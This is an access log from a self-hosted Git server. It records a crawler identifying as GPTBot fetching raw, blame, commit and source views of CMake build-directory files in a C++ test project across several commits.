"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:53:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:53:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21635] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21633] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9974] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21635] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21683] [Gzip 28.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21681] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21679] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21682] [Gzip 28.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:54:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11044] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11047] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21682] [Gzip 28.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21681] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15110] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15107] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15110] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9977] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21631] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9978] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21633] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21634] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15366] [Gzip 8.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:54:22 +0000] - 200 